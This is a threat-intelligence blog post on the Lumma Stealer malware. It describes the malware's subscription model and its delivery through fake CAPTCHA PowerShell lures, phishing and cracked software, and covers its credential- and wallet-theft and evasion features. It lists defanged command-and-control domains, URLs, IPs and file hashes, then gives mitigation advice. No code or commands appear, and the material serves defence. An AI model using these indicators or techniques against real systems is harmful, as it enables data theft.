Follow on X RSS Feed
Malware

Threat Surge as Lumma Stealer Expands Its Reach

Cybersec Sentinel

3 min read
Threat Surge as Lumma Stealer Expands Its Reach

Threat Group: Lumma (operated by "Shamel")
Threat Type: Information Stealer (Malware-as-a-Service)
Exploited Vulnerabilities: No specific vulnerabilities; relies on social engineering and deceptive tactics
Malware Used: Lumma Stealer (also known as LummaC2)
Threat Score: High (8.5/10) – Due to its advanced evasion techniques, broad targeting capabilities, and widespread distribution methods.
Last Threat Observation: January 1, 2025

Overview

Lumma Stealer is a widely accessible information-stealing malware sold openly across Dark Web forums and Telegram channels. While it may not yet rival the popularity of other stealers like RedLine and Formbook, it has rapidly gained traction among cybercriminals targeting sensitive data. Operated by a group suspected to originate from former USSR countries, Lumma Stealer has been in active development since its emergence in 2022, receiving substantial updates to enhance its capabilities.

Recent activity indicates an increase in campaigns deploying Lumma Stealer, leveraging deceptive methods like fake CAPTCHA pages to trick victims into running malicious scripts. Its compatibility with Windows operating systems from Windows 7 to Windows 11 allows the malware to exploit a vast user base. Under a Malware-as-a-Service (MaaS) model, Lumma Stealer is accessible to anyone willing to pay for a subscription. Subscribers are offered three different plans with features like access to a command-and-control (C2) panel, enabling operators to monitor and manage compromised systems.

Key Details

  • Delivery Method: Fake CAPTCHA pages, phishing emails, malicious downloads, and Discord messages.
  • Target: Users across various sectors, particularly cryptocurrency holders and those storing sensitive browser information.
  • Functions:
    • Data exfiltration from browsers and cryptocurrency wallets.
    • Regular updates from Command-and-Control (C2) servers.
    • Loader capabilities for deploying additional malware.
    • Advanced evasion techniques, including process hollowing and anti-sandbox measures.
    • Use of encryption to obfuscate malicious activities.
  • Obfuscation: Employs multi-layered encryption and process injection techniques to evade detection.

Attack Vectors

Lumma Stealer employs several deceptive methods to infiltrate systems:

  1. Fake CAPTCHA Pages: Users are tricked into interacting with seemingly legitimate CAPTCHA challenges, triggering malicious PowerShell scripts upon completion.
  2. Phishing Emails: Targets receive emails urging immediate action on fabricated security issues, leading them to malicious websites.
  3. Fake Software: Disguised as legitimate or cracked software, these downloads infect users' systems upon installation.
  4. Discord Messages: Operators engage with users on Discord, persuading them to download infected executables under false pretenses.

Known Indicators of Compromise (IoCs)

Domains

The following domains were flagged as potentially malicious:

  • sordid-snaked[.]cyou
  • wisdom-echoes[.]shop
  • wrathful-jammy[.]cyou
  • zinc-sneark[.]biz
  • ingreem-eilish[.]biz
  • impend-differ[.]biz
  • print-vexer[.]biz
  • se-blurry[.]biz
  • outlookyn[.]cyou
  • dare-curbys[.]biz
  • covery-mover[.]biz
  • brendon-sharjen[.]biz
  • awake-weaves[.]cyou
  • formy-spill[.]biz
  • dwell-exclaim[.]biz
  • permissiblene[.]click
  • stampyflook[.]click
  • wishbusher[.]click
  • aboriginalkyv[.]click
  • cryofficesj[.]click
  • fronyzealosud[.]click
  • noisercluch[.]click
  • regard-survey[.]cyou
  • squencehb[.]cyou
  • imbibelubmbe[.]click
  • rabidcowse[.]shop
  • framekgirus[.]shop
  • noisycuttej[.]shop
  • nearycrepso[.]shop
  • tirepublicerj[.]shop

URLs

The following URLs were identified as suspicious:

  • https[:]//zinc-sneark[.]biz/api
  • https[:]//wrathful-jammy[.]cyou/api
  • https[:]//wisdom-echoes[.]shop/api
  • https[:]//thumbystriw[.]store/api
  • https[:]//sordid-snaked[.]cyou/api
  • https[:]//se-blurry[.]biz/api
  • https[:]//print-vexer[.]biz/api
  • https[:]//presticitpo[.]store/api
  • https[:]//outlookyn[.]cyou/api
  • https[:]//ingreem-eilish[.]biz/api
  • https[:]//impend-differ[.]biz/api
  • https[:]//formy-spill[.]biz/api
  • https[:]//dwell-exclaim[.]biz/api
  • https[:]//dare-curbys[.]biz/api
  • https[:]//covery-mover[.]biz/api
  • https[:]//brendon-sharjen[.]biz/api
  • https[:]//awake-weaves[.]cyou/api

IP Addresses

These IP addresses were involved in potentially malicious activity:

  • 31[.]41[.]244[.]11
  • 212[.]87[.]222[.]185
  • 46[.]202[.]155[.]128
  • 65[.]38[.]120[.]31
  • 104[.]207[.]131[.]7

MD5 File Hashes

The following MD5 file hashes represent potentially malicious files:

  • a2cce95c15e92389bdc9cae07f132788
  • f0ac8625af9d1c712ab150214282fa9f
  • bb1940d0bf95170692fa7337e9766611
  • c75950b998dadf88b17dfc8625ae95d5
  • 44512d17e8d71a3aeec8da8cdf680b03
  • 6b1c50c8bfdaae57df937683a5a038fe
  • e362b5c0e0b719c0096b264fdc4399a5
  • 62e37543d34e1c4fd6bd017c3fac6fd4
  • 884e93bfc38c7810dd50b03df36a21d1
  • c3b9c8b07f7422818b268bbcf726a1a9
  • ccdff4b1fcc7f0bf1fee65fe759c2f63
  • 9ec644b8ee9774cffc1263fa6b34ec64

Mitigation and Prevention

  • User Awareness: Educate users on the risks of interacting with unsolicited emails, downloading cracked software, and executing scripts from untrusted sources.
  • Email Filtering: Implement robust email filtering to block phishing attempts and malicious attachments.
  • Antivirus Protection: Ensure updated antivirus software is in place to detect and block malware like Lumma Stealer.
  • Two-Factor Authentication (2FA): Enforce 2FA to secure access to sensitive systems and accounts.
  • Monitor Logs: Regularly analyze system logs for anomalies indicating potential compromise.
  • Regular Updates: Keep operating systems and applications patched to mitigate vulnerabilities.

Risk Assessment

Lumma Stealer poses a significant threat due to its evolving capabilities, widespread distribution, and sophisticated evasion tactics. Organizations and individuals are advised to adopt a multi-layered defense strategy to mitigate its impact effectively.

Conclusion

Lumma Stealer's growing adoption and evolution underscore the need for vigilance and proactive security measures. By understanding its delivery methods, capabilities, and indicators of compromise, organizations can bolster their defenses and mitigate potential damage.

Sources:

  1. ANY.RUN - "Lumma Stealer Analysis"
  2. Infosecurity Magazine - Infostealers Dominate as Lumma Stealer Detections Soar by Almost 400%
  3. Threatfox - Indicators of Compromise